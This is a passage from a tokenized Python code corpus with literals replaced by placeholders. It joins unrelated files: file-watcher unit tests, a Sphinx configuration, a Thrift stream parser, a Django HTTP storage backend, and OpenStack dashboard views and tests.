add_watch ( tmp_file , on_change , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> times = <NUM_LIT:3> <EOL> expected_content = [ ] <EOL> isFirst = True <EOL> for i in range ( times ) : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> new_line = new_content + str ( i ) <EOL> f = open ( tmp_file , '<STR_LIT:a>' ) <EOL> if isFirst : <EOL> isFirst = False <EOL> else : <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( new_line ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> expected_content . append ( new_line ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , i + <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , expected_content ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_multiple_watchers_on_single_config ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data1 = [ <NUM_LIT:0> , None , None ] <EOL> def on_change1 ( value , stat ) : <EOL> test_data1 [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data1 [ <NUM_LIT:1> ] = value <EOL> test_data1 [ <NUM_LIT:2> ] = stat . version <EOL> test_data2 = [ <NUM_LIT:0> , None , None ] <EOL> def on_change2 ( value , stat ) : <EOL> test_data2 [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data2 [ <NUM_LIT:1> ] = value <EOL> test_data2 [ <NUM_LIT:2> ] = stat . version <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change1 ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> watch . add_watch ( tmp_file , on_change2 ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . 
write ( new_content ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data1 [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data1 [ <NUM_LIT:1> ] , new_content ) <EOL> self . assertEqual ( test_data1 [ <NUM_LIT:2> ] , os . path . getmtime ( tmp_file ) ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:1> ] , new_content ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:2> ] , os . path . getmtime ( tmp_file ) ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_multiple_watchers_on_single_serverset ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data1 = [ <NUM_LIT:0> , None ] <EOL> def on_change1 ( value ) : <EOL> test_data1 [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data1 [ <NUM_LIT:1> ] = value <EOL> test_data2 = [ <NUM_LIT:0> , None ] <EOL> def on_change2 ( value ) : <EOL> test_data2 [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data2 [ <NUM_LIT:1> ] = value <EOL> new_content = "<STR_LIT>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change1 , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> watch . add_watch ( tmp_file , on_change2 , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> expected_serverset = new_content . split ( '<STR_LIT:\n>' ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> self . 
assertEqual ( test_data1 [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data1 [ <NUM_LIT:1> ] , expected_serverset ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:1> ] , expected_serverset ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_unrecognized_watch_type ( self ) : <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> def on_change ( value , stat ) : <EOL> pass <EOL> self . assertRaises ( <EOL> Exception , <EOL> watch . add_watch , <EOL> tmp_file , <EOL> on_change , <EOL> "<STR_LIT>" <EOL> ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> del watch <EOL> def test_exception_on_config_callback ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> def on_change1 ( value , stat ) : <EOL> raise Exception <EOL> test_data2 = [ <NUM_LIT:0> , None , None ] <EOL> def on_change2 ( value , stat ) : <EOL> test_data2 [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data2 [ <NUM_LIT:1> ] = value <EOL> test_data2 [ <NUM_LIT:2> ] = stat . version <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change1 ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> watch . add_watch ( tmp_file , on_change2 ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . 
assertEqual ( test_data2 [ <NUM_LIT:1> ] , new_content ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:2> ] , os . path . getmtime ( tmp_file ) ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_exception_on_serverset_callback ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> def on_change1 ( value ) : <EOL> raise Exception <EOL> test_data2 = [ <NUM_LIT:0> , None ] <EOL> def on_change2 ( value ) : <EOL> test_data2 [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data2 [ <NUM_LIT:1> ] = value <EOL> new_content = "<STR_LIT>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change1 , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> watch . add_watch ( tmp_file , on_change2 , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> expected_serverset = new_content . split ( '<STR_LIT:\n>' ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:1> ] , expected_serverset ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_nonexistent_config ( self ) : <EOL> def on_change ( value , stat ) : <EOL> pass <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> self . assertRaises ( <EOL> OSError , <EOL> watch . add_watch , <EOL> "<STR_LIT>" , <EOL> on_change <EOL> ) <EOL> self . 
_validate_empty_internal_map ( watch ) <EOL> del watch <EOL> def test_nonexistent_serverest ( self ) : <EOL> def on_change ( value ) : <EOL> pass <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> self . assertRaises ( <EOL> OSError , <EOL> watch . add_watch , <EOL> "<STR_LIT>" , <EOL> on_change , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> del watch <EOL> def test_null_callback_config ( self ) : <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> self . assertRaises ( <EOL> AssertionError , <EOL> watch . add_watch , <EOL> "<STR_LIT>" , <EOL> None <EOL> ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> del watch <EOL> def test_null_callback_serverset ( self ) : <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> self . assertRaises ( <EOL> AssertionError , <EOL> watch . add_watch , <EOL> "<STR_LIT>" , <EOL> None , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> del watch <EOL> def _validate_empty_internal_map ( self , watch ) : <EOL> self . assertEqual ( watch . _watched_file_map , { } ) <EOL> def _validate_internal_map ( self , watch , file_path , watch_type , watcher_count ) : <EOL> key = ( file_path , watch_type ) <EOL> watch_info = watch . _watched_file_map [ key ] <EOL> update_time = os . path . getmtime ( file_path ) <EOL> with open ( file_path ) as f : <EOL> hash = watch . _compute_md5_hash ( f . read ( ) ) <EOL> self . assertEqual ( watch_info [ <NUM_LIT:0> ] , update_time ) <EOL> self . assertEqual ( watch_info [ <NUM_LIT:1> ] , hash ) <EOL> self . assertEqual ( len ( watch_info [ <NUM_LIT:2> ] ) , watcher_count ) </s>
<s> import os <EOL> extensions = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> on_rtd = os . environ . get ( '<STR_LIT>' , None ) == '<STR_LIT:True>' <EOL> if not on_rtd : <EOL> import sphinx_rtd_theme <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> intersphinx_mapping = { '<STR_LIT>' : None } </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from collections import defaultdict <EOL> import sys <EOL> import traceback <EOL> from . thrift_message import ThriftMessage <EOL> class StreamContext ( object ) : <EOL> def __init__ ( self ) : <EOL> self . bytes = '<STR_LIT>' <EOL> class StreamHandler ( object ) : <EOL> def __init__ ( self , <EOL> outqueue , <EOL> protocol = None , <EOL> finagle_thrift = False , <EOL> max_message_size = <NUM_LIT> * <NUM_LIT:1000> , <EOL> read_values = False , <EOL> debug = False ) : <EOL> self . _contexts_by_streams = defaultdict ( StreamContext ) <EOL> self . _pop_size = <NUM_LIT> <EOL> self . _outqueue = outqueue <EOL> self . _protocol = protocol <EOL> self . _finagle_thrift = finagle_thrift <EOL> self . _max_message_size = max_message_size <EOL> self . _debug = debug <EOL> self . _read_values = read_values <EOL> self . _seen_messages = <NUM_LIT:0> <EOL> self . _recognized_streams = set ( ) <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> self . handler ( * args , ** kwargs ) <EOL> @ property <EOL> def seen_streams ( self ) : <EOL> return len ( self . _contexts_by_streams ) <EOL> @ property <EOL> def recognized_streams ( self ) : <EOL> return len ( self . _recognized_streams ) <EOL> @ property <EOL> def unrecognized_streams ( self ) : <EOL> return self . seen_streams - self . recognized_streams <EOL> @ property <EOL> def pending_thrift_msgs ( self ) : <EOL> return len ( self . _outqueue ) <EOL> @ property <EOL> def seen_thrift_msgs ( self ) : <EOL> return self . _seen_messages <EOL> def handler ( self , stream ) : <EOL> context = self . _contexts_by_streams [ stream ] <EOL> bytes , timestamp = stream . pop_data ( self . _pop_size ) <EOL> context . bytes += bytes <EOL> if len ( context . bytes ) >= self . _max_message_size : <EOL> if self . _debug : <EOL> print ( '<STR_LIT>' % len ( context . bytes ) ) <EOL> context . bytes = '<STR_LIT>' <EOL> return <EOL> view = memoryview ( context . 
bytes ) <EOL> for idx in range ( <NUM_LIT:0> , len ( context . bytes ) ) : <EOL> try : <EOL> data_slice = view [ idx : ] . tobytes ( ) <EOL> msg , msglen = ThriftMessage . read ( <EOL> data_slice , <EOL> protocol = self . _protocol , <EOL> finagle_thrift = self . _finagle_thrift , <EOL> read_values = self . _read_values ) <EOL> except EOFError : <EOL> continue <EOL> except Exception as ex : <EOL> if self . _debug : <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( <EOL> stream , <EOL> ex , <EOL> traceback . format_exc ( ) , <EOL> idx , <EOL> len ( context . bytes ) ) , <EOL> file = sys . stderr <EOL> ) <EOL> continue <EOL> self . _recognized_streams . add ( stream ) <EOL> self . _seen_messages += <NUM_LIT:1> <EOL> self . _outqueue . append ( ( timestamp , stream . src , stream . dst , msg ) ) <EOL> context . bytes = context . bytes [ idx + msglen : ] <EOL> break </s>
<s> try : <EOL> from urllib . parse import urljoin <EOL> except ImportError : <EOL> from urlparse import urljoin <EOL> try : <EOL> FileNotFoundError <EOL> except NameError : <EOL> FileNotFoundError = IOError <EOL> from io import BytesIO <EOL> import requests <EOL> import warnings <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . conf import settings <EOL> from django . utils . encoding import filepath_to_uri <EOL> from localdevstorage . base import BaseStorage <EOL> class HttpStorage ( BaseStorage ) : <EOL> def __init__ ( self , location = None , base_url = None , fallback_url = None , fallback_domain = None ) : <EOL> self . fallback_url = fallback_url or getattr ( settings , '<STR_LIT>' , None ) <EOL> if self . fallback_url : <EOL> warnings . warn ( '<STR_LIT>' ) <EOL> self . fallback_domain = fallback_domain or getattr ( settings , '<STR_LIT>' , None ) <EOL> if not ( self . fallback_url or self . fallback_domain ) : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' ) <EOL> self . session = requests . Session ( ) <EOL> username = getattr ( settings , '<STR_LIT>' , None ) <EOL> password = getattr ( settings , '<STR_LIT>' , None ) <EOL> if username and password : <EOL> self . session . auth = ( username , password ) <EOL> super ( BaseStorage , self ) . __init__ ( location , base_url ) <EOL> def _exists_upstream ( self , name ) : <EOL> try : <EOL> response = self . session . head ( self . _path ( name ) ) <EOL> return response . status_code == <NUM_LIT:200> <EOL> except FileNotFoundError : <EOL> return False <EOL> def _url ( self , name ) : <EOL> return urljoin ( '<STR_LIT:/>' , filepath_to_uri ( name ) ) <EOL> def _path ( self , name ) : <EOL> if self . fallback_domain : <EOL> return urljoin ( self . fallback_domain , self . _url ( name ) ) <EOL> return self . fallback_url + name <EOL> def _get ( self , name ) : <EOL> response = self . session . get ( self . _path ( name ) ) <EOL> if response . 
status_code != <NUM_LIT:200> : <EOL> raise FileNotFoundError ( ) <EOL> return BytesIO ( response . content ) </s>
<s> from google . appengine . api import images <EOL> from django import forms <EOL> from app . models . upload import UploadModel <EOL> class UploadForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = UploadModel <EOL> def clean_file ( self ) : <EOL> img = self . cleaned_data [ '<STR_LIT:file>' ] <EOL> return { <EOL> "<STR_LIT>" : images . resize ( img . read ( ) , <NUM_LIT> , <NUM_LIT> ) , <EOL> "<STR_LIT>" : img . content_type <EOL> } </s>
<s> from __future__ import absolute_import , division , print_function <EOL> from django . test import TestCase <EOL> class UrlRoutingTest ( TestCase ) : <EOL> def test_dummy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( True ) </s>
<s> from django import template <EOL> from django import http <EOL> from django . conf import settings <EOL> from django . contrib . auth . decorators import login_required <EOL> from django . shortcuts import render_to_response <EOL> from django . shortcuts import redirect <EOL> from django . utils . translation import ugettext as _ <EOL> import datetime <EOL> import json <EOL> import logging <EOL> import os <EOL> import subprocess <EOL> import sys <EOL> import urlparse <EOL> from django . contrib import messages <EOL> from django_openstack import api <EOL> from django_openstack import forms <EOL> from django_openstack . dash . views import instances as dash_instances <EOL> from django_openstack . decorators import enforce_admin_access <EOL> from openstackx . api import exceptions as api_exceptions <EOL> LOG = logging . getLogger ( '<STR_LIT>' ) <EOL> class ToggleService ( forms . SelfHandlingForm ) : <EOL> service = forms . CharField ( required = False ) <EOL> name = forms . CharField ( required = False ) <EOL> def handle ( self , request , data ) : <EOL> try : <EOL> service = api . service_get ( request , data [ '<STR_LIT>' ] ) <EOL> api . service_update ( request , <EOL> data [ '<STR_LIT>' ] , <EOL> not service . disabled ) <EOL> if service . disabled : <EOL> messages . info ( request , "<STR_LIT>" <EOL> % data [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> messages . info ( request , "<STR_LIT>" <EOL> % data [ '<STR_LIT:name>' ] ) <EOL> except api_exceptions . ApiException , e : <EOL> LOG . exception ( '<STR_LIT>' % <EOL> data [ '<STR_LIT>' ] ) <EOL> messages . error ( request , "<STR_LIT>" <EOL> % data [ '<STR_LIT:name>' ] , e . message ) <EOL> return redirect ( request . build_absolute_uri ( ) ) <EOL> @ login_required <EOL> @ enforce_admin_access <EOL> def index ( request ) : <EOL> for f in ( ToggleService , ) : <EOL> _ , handled = f . maybe_handle ( request ) <EOL> if handled : <EOL> return handled <EOL> services = [ ] <EOL> try : <EOL> services = api . 
service_list ( request ) <EOL> except api_exceptions . ApiException , e : <EOL> LOG . exception ( '<STR_LIT>' ) <EOL> messages . error ( request , '<STR_LIT>' % e . message ) <EOL> other_services = [ ] <EOL> for service in request . session [ '<STR_LIT>' ] : <EOL> url = service [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> try : <EOL> subprocess . check_call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:1>' , url ] , <EOL> stdout = open ( os . devnull , '<STR_LIT:w>' ) , <EOL> stderr = open ( os . devnull , '<STR_LIT:w>' ) ) <EOL> up = True <EOL> except : <EOL> up = False <EOL> hostname = urlparse . urlparse ( url ) . hostname <EOL> row = { '<STR_LIT:type>' : service [ '<STR_LIT:type>' ] , '<STR_LIT>' : url , '<STR_LIT:host>' : hostname , <EOL> '<STR_LIT>' : service [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , '<STR_LIT>' : up } <EOL> other_services . append ( row ) <EOL> services = sorted ( services , key = lambda svc : ( svc . type + <EOL> svc . host ) ) <EOL> other_services = sorted ( other_services , key = lambda svc : ( svc [ '<STR_LIT:type>' ] + <EOL> svc [ '<STR_LIT:host>' ] ) ) <EOL> return render_to_response ( <EOL> '<STR_LIT>' , { <EOL> '<STR_LIT>' : services , <EOL> '<STR_LIT>' : ToggleService , <EOL> '<STR_LIT>' : other_services , <EOL> } , context_instance = template . RequestContext ( request ) ) </s>
<s> import datetime <EOL> from django import http <EOL> from django . contrib import messages <EOL> from django . core . urlresolvers import reverse <EOL> from django_openstack import api <EOL> from django_openstack import utils <EOL> from django_openstack . tests . view_tests import base <EOL> from openstackx . api import exceptions as api_exceptions <EOL> from mox import IsA , IgnoreArg <EOL> class InstanceViewTests ( base . BaseViewTests ) : <EOL> def setUp ( self ) : <EOL> super ( InstanceViewTests , self ) . setUp ( ) <EOL> server = self . mox . CreateMock ( api . Server ) <EOL> server . id = <NUM_LIT:1> <EOL> server . name = '<STR_LIT>' <EOL> server . attrs = { '<STR_LIT:description>' : '<STR_LIT>' } <EOL> self . servers = ( server , ) <EOL> def test_index ( self ) : <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . servers ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . assertTemplateUsed ( res , <EOL> '<STR_LIT>' ) <EOL> self . assertItemsEqual ( res . context [ '<STR_LIT>' ] , self . servers ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_index_server_list_exception ( self ) : <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' ) <EOL> api . server_list ( IsA ( http . HttpRequest ) ) . AndRaise ( exception ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . assertTemplateUsed ( res , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( len ( res . context [ '<STR_LIT>' ] ) , <NUM_LIT:0> ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_terminate_instance ( self ) : <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . servers [ <NUM_LIT:0> ] . id , <EOL> } <EOL> self . mox . 
StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_get ( IsA ( http . HttpRequest ) , <EOL> str ( self . servers [ <NUM_LIT:0> ] . id ) ) . AndReturn ( self . servers [ <NUM_LIT:0> ] ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_delete ( IsA ( http . HttpRequest ) , <EOL> self . servers [ <NUM_LIT:0> ] ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . post ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) , <EOL> formData ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_terminate_instance_exception ( self ) : <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . servers [ <NUM_LIT:0> ] . id , <EOL> } <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_get ( IsA ( http . HttpRequest ) , <EOL> str ( self . servers [ <NUM_LIT:0> ] . id ) ) . AndReturn ( self . servers [ <NUM_LIT:0> ] ) <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' , <EOL> message = '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_delete ( IsA ( http . HttpRequest ) , <EOL> self . servers [ <NUM_LIT:0> ] ) . AndRaise ( exception ) <EOL> self . mox . StubOutWithMock ( messages , '<STR_LIT:error>' ) <EOL> messages . error ( IsA ( http . HttpRequest ) , IsA ( unicode ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . post ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) , <EOL> formData ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_reboot_instance ( self ) : <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . servers [ <NUM_LIT:0> ] . id , <EOL> } <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . server_reboot ( IsA ( http . 
HttpRequest ) , unicode ( self . servers [ <NUM_LIT:0> ] . id ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . post ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) , <EOL> formData ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_reboot_instance_exception ( self ) : <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . servers [ <NUM_LIT:0> ] . id , <EOL> } <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' , <EOL> message = '<STR_LIT>' ) <EOL> api . server_reboot ( IsA ( http . HttpRequest ) , <EOL> unicode ( self . servers [ <NUM_LIT:0> ] . id ) ) . AndRaise ( exception ) <EOL> self . mox . StubOutWithMock ( messages , '<STR_LIT:error>' ) <EOL> messages . error ( IsA ( http . HttpRequest ) , IsA ( str ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . post ( reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) , <EOL> formData ) <EOL> self . assertRedirectsNoFollow ( res , reverse ( '<STR_LIT>' , <EOL> args = [ self . TEST_TENANT ] ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def override_times ( self , time = datetime . datetime . now ) : <EOL> now = datetime . datetime . utcnow ( ) <EOL> utils . time . override_time = datetime . time ( now . hour , now . minute , now . second ) <EOL> utils . today . override_time = datetime . date ( now . year , now . month , now . day ) <EOL> utils . utcnow . override_time = now <EOL> return now <EOL> def reset_times ( self ) : <EOL> utils . time . override_time = None <EOL> utils . today . override_time = None <EOL> utils . utcnow . override_time = None <EOL> def test_instance_usage ( self ) : <EOL> TEST_RETURN = '<STR_LIT>' <EOL> now = self . override_times ( ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . usage_get ( IsA ( http . HttpRequest ) , self . 
TEST_TENANT , <EOL> datetime . datetime ( now . year , now . month , <NUM_LIT:1> , <EOL> now . hour , now . minute , now . second ) , <EOL> now ) . AndReturn ( TEST_RETURN ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , args = [ self . TEST_TENANT ] ) ) <EOL> self . assertTemplateUsed ( res , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( res . context [ '<STR_LIT>' ] , TEST_RETURN ) <EOL> self . mox . VerifyAll ( ) <EOL> self . reset_times ( ) <EOL> def test_instance_csv_usage ( self ) : <EOL> TEST_RETURN = '<STR_LIT>' <EOL> now = self . override_times ( ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . usage_get ( IsA ( http . HttpRequest ) , self . TEST_TENANT , <EOL> datetime . datetime ( now . year , now . month , <NUM_LIT:1> , <EOL> now . hour , now . minute , now . second ) , <EOL> now ) . AndReturn ( TEST_RETURN ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , args = [ self . TEST_TENANT ] ) + <EOL> "<STR_LIT>" ) <EOL> self . assertTemplateUsed ( res , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( res . context [ '<STR_LIT>' ] , TEST_RETURN ) <EOL> self . mox . VerifyAll ( ) <EOL> self . reset_times ( ) <EOL> def test_instance_usage_exception ( self ) : <EOL> now = self . override_times ( ) <EOL> exception = api_exceptions . ApiException ( '<STR_LIT>' , <EOL> message = '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api , '<STR_LIT>' ) <EOL> api . usage_get ( IsA ( http . HttpRequest ) , self . TEST_TENANT , <EOL> datetime . datetime ( now . year , now . month , <NUM_LIT:1> , <EOL> now . hour , now . minute , now . second ) , <EOL> now ) . AndRaise ( exception ) <EOL> self . mox . StubOutWithMock ( messages , '<STR_LIT:error>' ) <EOL> messages . error ( IsA ( http . HttpRequest ) , IsA ( str ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' , args = [ self . TEST_TENANT ] ) ) <EOL> self . 
